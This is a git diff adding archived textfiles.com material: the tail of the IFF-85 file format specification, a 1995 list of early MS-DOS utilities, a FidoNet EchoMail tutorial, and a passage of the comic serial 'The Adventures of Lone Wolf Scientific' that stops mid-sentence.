+you expect, say, the raster is smaller than those created by your +program, then adjust it. Similarly, your program could crop a large +picture, add or drop bitplanes, and create/discard a mask plane. The +program should give up gracefully on data that it can't convert. + +% If it doesn't start with "FORM", "LIST", or "CAT ", it's not +an IFF-85 file. + +% For any chunk you encounter, you must recognize its type ID +to understand its contents. + +% For any FORM chunk you encounter, you must recognize its FORM +type ID to understand the contained "local chunks". Even if you don't +recognize the FORM type, you can still scan it for nested FORMs, LISTs, +and CATs of interest. + +% Don't forget to skip the pad byte after every odd-length chunk. + +% Chunk types LIST, FORM, PROP, and CAT are generic groups. They +always contain a subtype ID followed by chunks. + +% Readers ought to handle a CAT of FORMs in a file. You may treat +the FORMs like document pages to sequence through or just use the +first FORM. + +% Simpler IFF readers completely skip LISTs. "Fully IFF-conforming" +readers are those that handle LISTs, even if just to read the first +FORM from a file. If you do look into a LIST, you must process shared +properties (in PROP chunks) properly. The idea is to get the correct +data or none at all. + +% The nicest readers are willing to look into unrecognized FORMs +for nested FORM types that they do recognize. For example, a musical +score may contain nested instrument descriptions and an animation +file may contain still pictures. + +Note to programmers: Processing PROP chunks is not simple! You'll +need some background in interpreters with stack frames. If this is +foreign to you, build programs that read/write only one FORM per file. +For the more intrepid programmers, the next paragraph summarizes how +to process LISTs and PROPs. See the general IFF reader module "IFFR.C" +and the example program "ShowILBM.C" for details. + +Allocate a stack frame for every LIST and FORM you encounter and initialize +it by copying the stack frame of the parent LIST or FORM. At the top +level, you'll need a stack frame initialized to your program's global +defaults. While reading each LIST or FORM, store all encountered properties +into the current stack frame. In the example ShowILBM, each stack +frame has a place for a bitmap header property ILBM.BMHD and a color +map property ILBM.CMAP. When you finally get to the ILBM's BODY chunk, +use the property settings accumulated in the current stack frame. + +An alternate implementation would just remember PROPs encountered, +forgetting each on reaching the end of its scope (the end of the containing +LIST). When a FORM XXXX is encountered, scan the chunks in all remembered +PROPs XXXX, in order, as if they appeared before the chunks actually +in the FORM XXXX. This gets trickier if you read FORMs inside of FORMs. + +Rules for Writer Programs + +Here are some notes on building programs that write IFF files, which +is much easier than reading them. If you use the standard IFF writer +module "IFFW.C" (see "Support Software" in Appendix A), many of these +rules and details will automatically be enforced. See the example +program "Raw2ILBM.C". + +% An IFF file is a single FORM, LIST, or CAT chunk. + +% Any IFF-85 file must start with the 4 characters "FORM", "LIST", +or "CAT ", followed by a LONG ckSize. There should be no data after +the chunk end. + +% Chunk types LIST, FORM, PROP, and CAT are generic. They always +contain a subtype ID followed by chunks. These three IDs are universally +reserved, as are "LIS1" through "LIS9", "FOR1" through "FOR9", "CAT1" +through "CAT9", and " ". + +% Don't forget to write a 0 pad byte after each odd-length chunk. + +% Four techniques for writing an IFF group: (1) build the data +in a file mapped into virtual memory, (2) build the data in memory +blocks and use block I/O, (3) stream write the data piecemeal and +(don't forget!) random access back to set the group length count, +and (4) make a preliminary pass to compute the length count then stream +write the data. + +% Do not try to edit a file that you don't know how to create. +Programs may look into a file and copy out nested FORMs of types that +they recognize, but don't edit and replace the nested FORMs and don't +add or remove them. That could make the containing structure inconsistent. +You may write a new file containing items you copied (or copied and +modified) from another IFF file, but don't copy structural parts you +don't understand. + +% You must adhere to the syntax descriptions in Appendex A. E.g. +PROPs may only appear inside LISTs. + + + + +Appendix A. Reference + +Type Definitions + +The following C typedefs describe standard IFF structures. Declarations +to use in practice will vary with the CPU and compiler. For example, +68000 Lattice C produces efficient comparison code if we define ID +as a "LONG". A macro "MakeID" builds these IDs at compile time. + +/* Standard IFF types, expressed in 68000 Lattice C. */ + +typedef unsigned char UBYTE; /* 8 bits unsigned */ +typedef short WORD; /* 16 bits signed */ +typedef unsigned short UWORD; /* 16 bits unsigned */ +typedef long LONG; /* 32 bits signed */ + +typedef char ID[4]; /* 4 chars in ' ' through '~' */ + +typedef struct { + ID ckID; + LONG ckSize; /* sizeof(ckData) */ + UBYTE ckData[/* ckSize */]; + } Chunk; + +/* ID typedef and builder for 68000 Lattice C. */ +typedef LONG ID; /* 4 chars in ' ' through '~' */ +#define MakeID(a,b,c,d) ( (a)<<<<24 | (b)<<<<16 | (c)<<<<8 | (d) ) + +/* Globally reserved IDs. */ +#define ID_FORM MakeID('F','O','R','M') +#define ID_LIST MakeID('L','I','S','T') +#define ID_PROP MakeID('P','R','O','P') +#define ID_CAT MakeID('C','A','T',' ') +#define ID_FILLER MakeID(' ',' ',' ',' ') + +Syntax Definitions + +Here's a collection of the syntax definitions in this document. + +Chunk ::= ID #{ UBYTE* } [0] + +Property ::= Chunk + +FORM ::= "FORM" #{ FormType (LocalChunk | FORM | LIST | CAT)* +} +FormType ::= ID +LocalChunk ::= Property | Chunk + +CAT ::= "CAT " #{ ContentsType (FORM | LIST | CAT)* } +ContentsType ::= ID -- a hint or an "abstract data type" ID + +LIST ::= "LIST" #{ ContentsType PROP* (FORM | LIST | CAT)* } +PROP ::= "PROP" #{ FormType Property* } + +In this extended regular expression notation, the token "#" represents +a ckSize LONG count of the following {braced} data bytes. Literal +items are shown in "quotes", [square bracketed items] are optional, +and "*" means 0 or more instances. A sometimes-needed pad byte is +shown as "[0]". + +Defined Chunk IDs + +This is a table of currently defined chunk IDs. We may also borrow +some Macintosh IDs and data formats. + +Group chunk IDs + FORM, LIST, PROP, CAT. +Future revision group chunk IDs + FOR1 I FOR9, LIS1 I LIS9, CAT1 I CAT9. +FORM type IDs + (The above group chunk IDs may not be used for FORM type IDs.) + (Lower case letters and punctuation marks are forbidden in FORM +type IDs.) + 8SVX 8-bit sampled sound voice, ANBM animated bitmap, FNTR raster +font, FNTV vector font, FTXT formatted text, GSCR general-use musical +score, ILBM interleaved raster bitmap image, PDEF Deluxe Print page +definition, PICS Macintosh picture, PLBM (obsolete), USCR Uhuru Sound +Software musical score, UVOX Uhuru Sound Software Macintosh voice, +SMUS simple musical score, VDEO Deluxe Video Construction Set video. +Data chunk IDs + "JJJJ", TEXT, PICT. +PROP LIST property IDs + OPGM, OCPU, OCMP, OSN, UNAM. + + + +Support Software + +These public domain C source programs are available for use in building +IFF-compatible programs: + +IFF.H, IFFR.C, IFFW.C + + IFF reader and writer package. + These modules handle many of the details of reliably + reading and writing IFF files. + +IFFCheck.C This handy utility program scans an IFF file, checks + that the contents are well formed, and prints an outline + of the chunks. + +PACKER.H, Packer.C, UnPacker.C + + Run encoder and decoder used for ILBM files. + +ILBM.H, ILBMR.C, ILBMW.C + + Reader and writer support routines for raster image + FORM ILBM. ILBMR calls IFFR and UnPacker. ILBMW calls + IFFW and Packer. + +ShowILBM.C + Example caller of IFFR and ILBMR modules. This + Commodore-Amiga program reads and displays a FORM ILBM. +Raw2ILBM.C + Example ILBM writer program. As a demonstration, it + reads a raw raster image file and writes the image + as a FORM ILBM file. +ILBM2Raw.C + Example ILBM reader program. Reads a FORM ILBM file + and writes it into a raw raster image. + +REMALLOC.H, Remalloc.c + + Memory allocation routines used in these examples. + +INTUALL.H generic "include almost everything" include-file + with the sequence of includes correctly specified. + +READPICT.H, ReadPict.c + + given an ILBM file, read it into a bitmap and + a color map + +PUTPICT.H, PutPict.c + + given a bitmap and a color map, save it as + an ILBM file. + +GIO.H, Gio.c generic I/O speedup package. Attempts to speed + disk I/O by buffering writes and reads. + +giocall.c sample call to gio. + +ilbmdump.c reads in ILBM file, prints out ascii representation + for including in C files. + +bmprintc.c prints out a C-language representation of data for + a bitmap. + + + +Example Diagrams + +Here's a box diagram for an example IFF file, a raster image FORM +ILBM. This FORM contains a bitmap header property chunk BMHD, a color +map property chunk CMAP, and a raster data chunk BODY. This particular +raster is 320 x 200 pixels x 3 bit planes uncompressed. The "0" after +the CMAP chunk represents a zero pad byte; included since the CMAP +chunk has an odd length. The text to the right of the diagram shows +the outline that would be printed by the IFFCheck utility program +for this particular file. + + +-----------------------------------+ + |'FORM' 24070 | FORM 24070 IBLM + +-----------------------------------+ + |'ILBM' | + +-----------------------------------+ + | +-------------------------------+ | + | | 'BMHD' 20 | | .BMHD 20 + | | 320, 200, 0, 0, 3, 0, 0, ... | | + | + ------------------------------+ | + | | 'CMAP' 21 | | .CMAP 21 + | | 0, 0, 0; 32, 0, 0; 64,0,0; .. | | + | +-------------------------------+ | + | 0 | + +-----------------------------------+ + |'BODY' 24000 | .BODY 24000 + |0, 0, 0, ... | + +-----------------------------------+ + +This second diagram shows a LIST of two FORMs ILBM sharing a common +BMHD property and a common CMAP property. Again, the text on the right +is an outline a la IFFCheck. + + + +-----------------------------------------+ + |'LIST' 48114 | LIST 48114 AAAA + +-----------------------------------------+ + |'AAAA' | .PROP 62 ILBM + | +-----------------------------------+ | + | |'PROP' 62 | | + | +-----------------------------------+ | + | |'ILBM' | | + | +-----------------------------------+ | + | | +-------------------------------+ | | + | | | 'BMHD' 20 | | | ..BMHD 20 + | | | 320, 200, 0, 0, 3, 0, 0, ... | | | + | | | ------------------------------+ | | + | | | 'CMAP' 21 | | | ..CMAP 21 + | | | 0, 0, 0; 32, 0, 0; 64,0,0; .. | | | + | | +-------------------------------+ | | + | | 0 | | + | +-----------------------------------+ | + | +-----------------------------------+ | + | |'FORM' 24012 | | .FORM 24012 ILBM + | +-----------------------------------+ | + | |'ILBM' | | + | +-----------------------------------+ | + | | +-----------------------------+ | | + | | |'BODY' 24000 | | | ..BODY 24000 + | | |0, 0, 0, ... | | | + | | +-----------------------------+ | | + | +-----------------------------------+ | + | +-----------------------------------+ | + | |'FORM' 24012 | | .FORM 24012 ILBM + | +-----------------------------------+ | + | |'ILBM' | | + | +-----------------------------------+ | + | | +-----------------------------+ | | + | | |'BODY' 24000 | | | ..BODY 24000 + | | |0, 0, 0, ... | | | + | | +-----------------------------+ | | + | +-----------------------------------+ | + +-----------------------------------------+ + + + +Appendix B. Standards Committee + +The following people contributed to the design of this IFF standard: + +Bob "Kodiak" Burns, Commodore-Amiga +R. J. Mical, Commodore-Amiga +Jerry Morrison, Electronic Arts +Greg Riker, Electronic Arts +Steve Shaw, Electronic Arts +Barry Walsh, Commodore-Amiga diff --git a/textfiles.com/computers/earlybst.txt b/textfiles.com/computers/earlybst.txt new file mode 100644 index 00000000..1f69b9bf --- /dev/null +++ b/textfiles.com/computers/earlybst.txt @@ -0,0 +1,107 @@ +EARLYBST.TXT (All rights reserved) Wed 13-September-1995 + +Timo's subjective choice of best PD & SW MS-DOS early material +-------------------------------------------------------------- + +Not surprisingly many of the selections that were on my earlier +versions of the best programs list BESTPROG.TXT were utilities that +complemented what the earlier MS-DOS versions lacked. I have moved +the consequently outdated selections in here. + +ask.exe The most important command originally missing from + MS-DOS batch programming. Ask comes under many names + and has been rewritten by countless programmers. + Also I have written my own in ftp://garbo.uwasa.fi + /pc/ts/tsbat47.zip. The basic idea of asks is to + prompt the user for a choice, and return an + errorlevel (or sometimes put a value to an + environment variable), which then can be used for a + conditional jump in the batch in accordance with the + user's choice. My own ask uses the most common ask + standard of returning as the errorlevel the ASCII + number of the first letter of the user's response, + but I also have written an errorlevel version. It is + interesting that MicroSoft finally succumbed and + introduced a similar command in MS-DOS 6.0 calling + it CHOICE. You can find a choice clone choose.exe in + tsutlf15.zip if you don't have MS-DOS version 6+. + Furthermore, although little known, ordinary batch + programming can be used to input the user's response + to an environment variable, as explained in + tsbat47.zip. + +ced10da.zip Command line editor. This facility lets the user to + recall earlier commands, edit the commands, make + aliases (synonyms) for the commands, and optionally + ignore commands. CED is old, but still extremely + useful as such even compared DOSKEY which was + introduced with MS-DOS 5.0. Don't go without it, or + some other good, alternative command line editor. + Despite being old, CED still often features on the + best program lists of many computer magazines. The + one feature CED unfortunately lacks is file name + completion present in some other command line + editors. The later versions of CED have gone + commercial, as far as I know. For other + alternatives, like command line editors with file + name completion, see Garbo's /pc/cmdutil directory. + +dirw.exe From my own ftp://garbo.uwasa.fi/pc/ts/tsutil41.zip + utility collection. It is like MS-DOS dir /w, but it + also shows the file attributes, and it can be made + to recurse all the directories. I use it on a daily + basis to have a backup list of what my hard disks + contain. It is vindicative to note that in DOS 5.0 + the new DIR command was endowed among other things + with abilities what my dirw already had. Yet + dirw.exe still has a feature which the MS-DOS dir + curiously lacks (at least in MS-DOS 5.0). My + dirw.exe displays the size of a disk also if it has + no files. + +keyrate.exe From my own ftp://garbo.uwasa.fi/pc/ts/tsutld22.zip + utility collection. What it effectively does is that + it speeds up the cursor movement. An absolute + necessity because the slow default keyrepeat rate + makes moving the cursor a real pain in the neck. + Mostly found only in commercial packages. Haven't + seen many shareware or PD "competitors", but I may + be too "optimistic". MS-DOS 5.0 finally introduced + this feature into the MODE command, which goes to + show that the idea was a good one. - On MS-DOS 3.3 I + have in my autoexec.bat "keyrate 0 0". In 5.0 (and + 6.0) I use "mode con: rate=30 delay=1". Since some + programs (e.g. Windows) alter the typemaatic rate, I + also have "doskey fast=mode con: rate=32 delay=1" in + my AUTOEXEC.BAT. + +tlb-v252.zip The Last Byte MS-DOS Upper Memory Manager by Dan + Lewis. It enables loading device drivers and TSRs to + high memory. Such a utility becomes a practical + necessity when the number of memory-hungry TSRs + grows, as happened on my late MS-DOS 3.30 office 386 + where I had, for example, a network driver to + connect to our department's laser printer. None of + the upper memory managers are simple to use, but + Dan's is not prohibitively difficult as some others. + At the time of first introducing this list Dan was + upgrading to 2.00 with a new user interface. (I was + of the beta testers, and I don't accept such a task + easily because of my own time limitations). Last + Byte is a typical example of a utility grown out of + deficiencies of the earlier MS-DOS versions. The + upper memory management was finally introduced in + MS-DOS 5.0 with the all important power user's + LOADHIGH command. Dan has a mailing list on Internet + for TLB users. Last Byte still is a fine program, + but has naturally lost practially all its edge with + the introduction of MS-DOS' own memory management in + version 5.0. But it qualifies on the list "for fine + services rendered". As far as I understand, Dan has + decided to give up maintaing the progra, + +.................................................................... +Prof. Timo Salmi Co-moderator of news:comp.archives.msdos.announce +Moderating at ftp:// & http://garbo.uwasa.fi archives 193.166.120.5 +Department of Accounting and Business Finance ; University of Vaasa +ts@uwasa.fi http://uwasa.fi/~ts BBS 961-3170972; FIN-65101, Finland diff --git a/textfiles.com/computers/echtutor.txt b/textfiles.com/computers/echtutor.txt new file mode 100644 index 00000000..3374de86 --- /dev/null +++ b/textfiles.com/computers/echtutor.txt @@ -0,0 +1,351 @@ + + ===ECHOMAIL TUTORIAL=== + + This is a brief tutorial about a new Fido + phenomena called EchoMail. The first half of this + tutorial is for users. It explains how you enter + messages, and use EchoMail to send messages to + others. The second half is for EchoMail sysops. It + is to explain how to implement EchoMail on your + board. + + + ===USER'S TUTORIAL=== + + What EchoMail does for you is allow you to + talk to people on other Fido boards across the + country without having to know who, or where they + are. You can tell an EchoMail Area from the Area + Name. It will say something about echo, mirrors, + national conference, etc. All you have to do is + enter a message in one of these areas, and it is + automatically sent out to any and all Fido boards + participating in that particular area. + + ===CAUTION! PRIVATE MESSAGES ECHO=== + + All the messages in each echo area are sent + out to other boards, even if they are labeled + private. Also, anyone with Sysop priveleges can + read a private message. Beware! If you want to send + a private message to someone, try to use another + area besides an Echo Area. + + ===IF YOU DO NOT WANT A MESSAGE ECHOED=== + + EchoMail does provide a way to enter a message + into an area and have it stay locally on that + board. In order to do that, you enter a key word on + the first line of the message. If you enter the + word 'NOECHO' as the first line of a message, all + in caps, without leading spaces, the message will + appear in that area only on the board it was + entered on. + + Now, all you have to do to use EchoMail, is + read the messages in the Echo Areas, and enter or + reply to them. EchoMail takes care of the rest. + Please participate in EchoMail with us. We provide + this as a sevice, and would really enjoy seeing it + put to use. Enjoy! + + ===ODDITIES AND IDEOSYNCHROSIES=== + + At the end of each message in an Echo Area, + there are several lines of information about that + particular message's travel across the country. The + first is call the Origin line, and shows the name + of the board that the message was entered on. That + name may or may not be a familiar name to you. At + the end of the line there are two numbers in + parenthesis separated by a slash (/). This is the + address of the originating bulletin board. The + first number is called the net number, and the + second is called the node number. The net number + defines a geographical area. I.E. Dallas is net + 124. The node number refers to the particular board + within that area that originally sent the message. + This board number is 210. You can find a listing of + all the net/node numbers in the entire world in a + file called 'FIDOLIST.BBS' on almost any Fido + board. + + The rest of the message is composed of a + series of lines that start with the keyword 'SEEN- + BY'. This is a list of Fido net/nodes that have + already received that message. This is how EchoMail + tells whether it has already sent a message or not. + You can usually ignore the information in the seen- + by line unless you are trying to figure out how a + message got from there to here. The seen-by is used + by the sysop to determine if he is distributing + mail to all the nodes as efficiently as possible. + + Sometimes you will see the same message twice + in an Echo Area. This is the most annoying part of + using an EchoMail area. Since the messages pass + from node to node through the phone lines, + sometimes a message get garbled or not all of a + group of messages get passed down the line. When + this happens, Fido decides it is better to resend + all the messages and make sure at least one set + gets through intact. Sometimes this results in + having the same message sent twice. + + The rest of this tutorial is designed to help + new sysops set up an EchoMail area on there board. + Unless you are trying to set up a Fido or EchoMail, + you can press Control-C or Control-K to return to + the board now. I hope you enjoy national + conferencing with EchoMail! + + + ===NEW ECHOSYSOP'S TUTORIAL=== + + If you are a Fido sysop trying to set up + EchoMail, this section should help you. EchoMail + allows you to share common message bases among + several Fidos. In fact, some of the conferences + have a few hundred boards participating. Echo has + added greatly to the communications abilities of + Fido, and has helped a lot of us get to know each + other. The problem with regular netmail is that you + have to =know= someone to send mail to, or you have + to be replying to a message that they sent you. + EchoMail simplifies this. You 'hook in' to + EchoMail, and the conversations are already there. + + EchoMail is not free. Someone has to pay for + transmitting the messages just like regular + netmail. The established procedure is to find + someone either locally, or in a low toll zone for + you to poll. Other arrangements are made + frequently, this is just the most common method of + approaching it. Unless the person you are attached + to is using a business line to make his calls, or + is a local call for you, you will probably end up + having to pay for the service. + + On a per message basis, EchoMail is cheaper + than regular mail, but the volume is EXTREMELY + higher. This means you can expect your telephone + bill to increase dramatically if you decide to join + in EchoMail. However, the information gained, and + the enjoyment of having ongoing conversations with + people around the world far outweigh the costs. + + + === HOOKING INTO AN ECHOMAIL CONFERENCE === + + + Probably the first step in linking into an + EchoMail conference is to contact your network, or + region host. These people are starting to keep + track of the participants in EchoMail, and can more + than likely steer you to a person in your area who + is carrying the conference you are interested in. + Start by sending a note to your host requesting + information about the conference you care to join. + If he replies with a note referring you to a local + node, send them a message including your voice + number. It is much easier to set things up by voice + than by typing at each other. Eventually you will + get in contact with the local person, and make + arrangements. Later in this document we will talk + about the specifics of implementing EchoMail. We'll + leave it as being up to you and your EchoMail + contact to make arrangements about times, calls, + conferences, etc. Needless to say, this will vary + greatly depending on phone costs and the existing + method of distribution in your area. + + If you cannot find a local connection, the + next step is to contact the EchoMail coordinator in + your region. These people are responsible for + maintaining information about EchoMail conferences + that cross regional boundaries. That means if you + are looking for a link into the 'basket weaving' + conference, and it is only carried in net 141, + you're on your own. Regional traffic is just that. + If it is a local conference, you will not get + information for linking in from the regional + EchoMail coordinator. + + On the other hand, if the conference you are + looking for is national in scope, these people can + be of great assistance in locating a link point for + you. The person from the following list that you + should contact will depend on the region you are + in. If you are in region 13, don't call the person + in region 19. + + + === REGIONAL ECHOMAIL COORDINATORS === + + + Region Name Network Address + + 10 Butch Walker 161/1 + 11 Don Walker 120/20 + 12 Pacific Not Assigned Contact Jon Sabol + 13 Gee Wong 107/312 + 14 Alex Hartley 100/500 + 15 David Dodell 114/15 + 16 Bob Hartman 132/101 + 17 Randy Bush 122/6 + 18 Wes Cowley 137/19 + 19 Jon Sabol 124/210 + + + These people should be able to put you in + contact with someone who can feed you an Echo link. + Currently the Pacific region is unassigned as there + does not appear to be an Echo conference running + out there. This is a case where costs become + important. For someone in Hawaii to participate in + a national conference, they would have to make + overseas calls to get their mail. That would become + quite expensive. + + Last, but not least, you can try someone who's + name you see in an existing conference. If, and + only if the above methods do not work, try + contacting someone who is geographically close to + you and is participating in the conference. Usually + they can at least steer you to someone else who + might be able to tie you into the area. + + + === OPERATIONAL OVERVIEW === + + + EchoMail operation is fairly complex and + requires a considerable amount of processing time + outside of the regular mail times. It is not + automatic. You must set up a series of external + events to run the EchoMail programs, and process + your incoming and outgoing mail. This WILL take + some time away from your normal BBS operations, but + will provide your users with a much nicer set of + message areas. Besides, most of the processing + takes place in the wee hours of the morning, and + caller activity is low then anyway. + + Echo works by moving mail back and forth + between your mail area, and the message bases you + specify to be EchoMail areas. This is done using a + control file called 'AREAS.BBS'. It must reside in + your Fido root directory, and consists of the + following format: + + (line 1) ! + + Board name is the name you want to appear + in the seenby line of each message + originating on your board. + + ! is a delimiter and is required. + + Sysop's name is the name to be + substituted in messages from the sysop on + your board. + + (line 2) + + AREA_NUMBER is the Fido messagebase + number that you want to use for the Echo + area. + + AREA_TAG is the name that the message + base uses to keep it seperate from other + Echo traffic. + + NODELIST is a list of net/node numbers + that you have made arrangements to share + messages with. DO NOT ARBITRARILY ADD + NODES TO THIS LIST!!! + + This repeats for each area you are + participating in. + + + There are basically two programs that comprise + the heart of EchoMail: + + TOSSMAIL moves incoming mail into the + appropriate message bases. + + SCANMAIL moves mail entered on your board + into the netmail area to be sent + to other boards. + + Scanmail is run right after a mail event to + move messages out of the mail area, and into the + area you have chosen to hold a conference. Tossmail + is run right before a mail event to move messages + originating on your board into the mail area to be + sent to the other participating nodes. This is the + simplest method of implementing EchoMail, it is not + the most efficient. Fido is extremely slow in + packetting and unpacketting mail. This will result + in an extreme degredation of the system. You can + expect a delay of approximately 1 minute per 10 + messages of outgoing mail, and 1 minute per 25 + messages incoming mail using Fido to packet and de- + packet EchoMail. This is significant since most of + the national conferences average about 40 messages + per day. + + However, Thom Henderson has provided us with a + utility that packets mail without Fido. It is + called ARCmail, and will dramatically improve the + speed of your pre and post mail events. This + utility reads all the messages to a node, and + creates a file that can be transmitted instead of + the messages themselves. This means that whether + you are sending one or a hundred messages, you + still only use Fido to packet one message. ARCmail + runs approximately 75 percent faster than Fido for + packetting mail. + + There are several other EchoMail utilities + that can make life a little easier. KILLDUPES is a + fast program that goes through a message base and + deletes messages that have the same From, To, Date, + and Subject fields. This is the biggest problem + with EchoMail. If it is not implemented right, you + end up spending someone else's money to send repeat + messages. Killdupes somewhat solves this problem. + + TidyMail goes through a message base and does + some similar things. In addition, it can sort your + message base chronologically if you so desire. This + is a matter of personal taste. Some people like it, + others don't. + + Seenby is a very important utility if you ever + add anyone to your distribution list. It goes + through and marks a message base as having been + sent already to a group of nodes. If you add + someone to a message base that has 300 messages in + it, you don't want to send them all out. You want + to let that person start at the current message + number in that area. Seenby makes this easy. + + + === SUMMARY AND INFORMATION === + + This concludes this brief summary of EchoMail. + If you have not captured this entire document, you + can download it in area one under the name of + ECHTUTOR.DOC. More thorough information is + available in the documentation for EchoMail. This + is an overview to help you decide if you want to + start EchoMail on your system. I hope this has + helped, if not you can contact: + + Jon Sabol National EchoMail Help + Fido 124/210 + 214/380-9063 (data) + 214/380-2474 (voice) + diff --git a/textfiles.com/computers/eight.lws b/textfiles.com/computers/eight.lws new file mode 100644 index 00000000..ad247899 --- /dev/null +++ b/textfiles.com/computers/eight.lws @@ -0,0 +1,336 @@ +---------------------------------------------- +"The Adventures of Lone Wolf Scientific" +------------------------------------------ +An electronically syndicated series that +follows the exploits of two madcap +pioneers of technology. Copyright 1991 +Michy Peshota. May not be distributed +without accompanying WELCOME.LWS and +EPISOD.LWS files. +----------------------- +EPISODE #8 +----------------------- + + + The House Where Andrew.BAS Lived + +>>S-max discovers that the gentle programmer's abode is the +perfect place to house his electric tuba, his 450-pound dot +matrix printer, and his classic soldering iron collection-- +as well as inhabit indefinitely.<< + + by Michy Peshota + + + The home of a computer programmer is always a special +place. It's where pure and perfect cerebral sensibility +clash with a complete ineptitude with tangible things. In +it you'll find no chinz-covered chairs or china dogs on the +shelves. You'll see no neatly tied-back curtains or +sculptured carpet. You're more apt to find a thousand +dogeared sci-fi novels stacked neatly in a livingroom corner +and the rooms bare except for that. The house where +Andrew.BAS lived was no exception. It was a blasted wood A- +frame as sorrowful as if it once housed Trophonius himself. + + As Andrew.BAS walked up the crumbling steps late that +night with his officemate, the latter pointed questioningly +to the two Greek letters that dangled from the rotting +railing of the second-story porch. + + "It's a former college fraternity house," the +programmer explained. "I rented it because I thought it +might be fun to get a bunch of other programmers to move in. +We could stay up late at night watching 'Star Trek' reruns, +playing ping-pong, and watching each other's programs +compile." + + The computer builder looked at him anxiously. "You +haven't gotten any other programmers to move in yet, have +you?" + + "Well, no." + + "That's a relief. I don't think I would survive very +long in a household where the preferred form of +entertainment is watching a program compiler throw up at +every encounter with some brains-in-a-wristwatch +programmer's spastic assault upon a logic gate." + + "You could play ping-pong." + + "No, I couldn't. Genius computer builders such as +myself have very delicate constitutions. The massive amount +of intellect rushing around in our forebrains at any given +moment inhibits our hopping around with an imbecilic ball +and paddle." He grunted. "We get naseous and tumble over." + + "It must be hard for you to find pleasure in life." + + "Oh, it is," he despaired. "You have no idea what it's +like to have an I.Q. the size of a winning lotto number, +while the rest of the human race is relegated to one so puny +that the measure of it cubed wouldn't even equal the number +of pennies required to ride a city bus." He grunted. +"Sometimes, desperate for intelligent conversation, I find +myself wandering the aisles of the local Radio Shack late at +night, seizing the lapels of anyone headed to the checkout +with a profusion of audio connectors." + + Andrew.BAS was glad that he had always obeyed instinct +and avoided cheap electronics stores after dark. As he +jiggled the key in the lock, the whole house quivered and +the scarecrow propped in the front window dropped its weary +head to its chest as if it were embarrassed to be there. +The programmer kicked the door open, while his houseguest +stood back and surveyed with approval the forest of TV +antennas sprouting from the tattered roof. He then scurried +to the back of the house to check out the power lines +running to it. The programmer heard him shout from the +backyard, "You have good electricity!" + + Inside the house, Andrew.BAS deadpanned, "That's a +relief," and deposited his briefcase full of sci-fi novels +on the floor. + + Once the blowzy computer builder reappeared, Andrew.BAS +nodded toward the ten-gallon drum of liquid marshmallow and +the green felt Robin Hood hat and tights that were lying in +the middle of the livingroom floor. "The nearest I can +figure, those--and the scarecrow in the window--are left +over from a fraternity prank." + + S-max hurried over to the drum of marshmallow. He +inspected it covetously. "If I were you, I'd take better +care of something as valuable as this. You never know when +it might come in handy." + + "You can have it if you want." + + "Can I?" + + "Why not? Take the hat and tights too." + + "Honestly?!" + + "I never want to see them again." + + S-max pulled a crooked screwdriver from his army jacket +pocket and began prying the lid off the drum of marshmallow. +"I can't tell you the number of times I've been in the midst +of an all-night reverse-engineering spree and been in a +panic for a little something sweet." He poked his +screwdriver into the curdled goo inside the drum. He pulled +it out and nodded with approval. "Something like this would +have solved all my snacking problems." + + Other than the marshmallow and the Robin Hood +accoutrements, the house was empty, and the computer builder +made note of this as he made a hasty tour of its rooms. +Returning to the livingroom, he gestured imperiously to its +center. "<> is where my research and development +couch will go," he said. Before his host could object, he +gestured toward the kitchen and declared, "See that grubby +spot now occupied unattractively by the sink, the stove, and +the broken dishwasher? That's where my PDP-1 will go." He +pointed in the opposite direction toward the bathroom. "My +450-pound dot matrix printer will fit nicely in the shower +stall--which will be quite convenient since it tends to spew +out motor oil whenever it prints anything but mathematical +symbols." He flung his arm toward the empty dinette. +"That's where my electric tuba will sit. My popcorn maker, +though, will be housed in the spare bedroom with the +flashing Budweiser sign--" + + "Flashing Budweiser sign?" Andrew.BAS interrupted. "Is +that the same one from the rescue mission?" + + "Yes, it was given to me by Phil." + + "The miscreant in the next cot?" + + "That's right. It was a token of esteem which he +presented to me after I introduced him to the magic of +double-diffused silicon planar passivated transistor +theory." + + "Oh?" + + "It completely changed his life. He stopped talking to +the arts and crafts wagon and started addressing the +electrical outlets as 'My Man Mr. D.D. Double Confused.'" +The computer builder continued with his decorating plans, +"And we'll run daisy-chained extension cords out the +windows, into the garage, out back around the washpoles, and +back in through the basement windows. According to my +calculations, fifty or sixty should be enough to start with. +I noticed that there was only one outlet in the basement, +but that should be sufficient, at least for the time being, +for my assortment of 14 DEC computers. We may eventually +have to install a second outlet." He made a quick +inspection of the livingroom's electrical outlets. "These +aren't grounded," he said with a frown, then brightened, +"but that hardly matters because I never ground any of the +computers I build anyway." + + He shuffled out the front door to retrieve his bedding +from his van. Andrew.BAS felt a growing doom as he realized +that the bumptious S-max planned to stay longer than one +evening. When he reappeared he was toting a worn, fringed +blanket. It was dotted with spaceships. Tucked under his +arm was a ragged corduroy couch pillow. Andrew.BAS took a +corner of the blanket in his hands and marvelled, "This +looks like you've had it since you were a kid." + + "I have," S-max said. He offered the couch pillow for +inspection. "This was a love token given to me by a lady at +the rescue mission." + + "Really?" + + "She was a bag-lady. She wore a different plastic bird +pinned to her blouse everyday as a sign of her solidarity +with the pigeons on the roof." + + "You certainly seem to have made a lot of friends at +the rescue mission." + + "Yes, it was the first time in my life that I found +others with whom it was easy to share my soul--except of +course for the artificial intelligence lab at MIT, which was +a great deal like the rescue mission, only twelve times +over." + + "How so?" + + "The people there really did care whenever my mattress +started on fire." He grunted nostalgically. + + Once S-max had decided where where all of his +possessions were to be placed, he turned to this host. +"Where are you going to live from now on?" + + "I'm staying in one of the bedrooms at the moment," +Andrew.BAS replied glibly. + + "No, no, that won't do at all! I plan to use both +bedrooms for my collection of classic soldering irons." + + "<> soldering irons?" + + "That's right. Some of them were manufactured as early +as 1987." S-max pointed toward the kitchen in distress. +"As you can see, not all of the soldering irons will fit on +the kitchen table." He pointed to each of the room's +windowsills in turn. "And there are too many to fit on the +windowsills. And I can't put them on the bathroom counter +because someone might mistake them for curling irons and +gook them up with styling mousse--" + + "How many classic soldering irons do you have?" + + "Two-hundred-fifty-seven." + + "I see." + + "Only until I get the rest out of hock. Then they'll +be 343." + + Andrew.BAS pondered diplomatically. "Maybe you could +put them in the attic?" + + "NO!" came the howl of response. "YOU will go in the +attic." + + "But I--" + + "Please, don't argue with me. I've had a hard enough +day already. The thought of arguing with a mere brains-in- +a-function-key programmer is as tiresome to me as the +thought of staying up all night spooning all that +marshmallow into single-serving-size portions." He unfolded +his rocketship-flocked blanket in the middle of the +livingroom floor defiantly. "As you'll discover, the idea +of a low-life computer programmer such as yourself living on +the same floor as the one I'm living on is as odious to me +as the thought 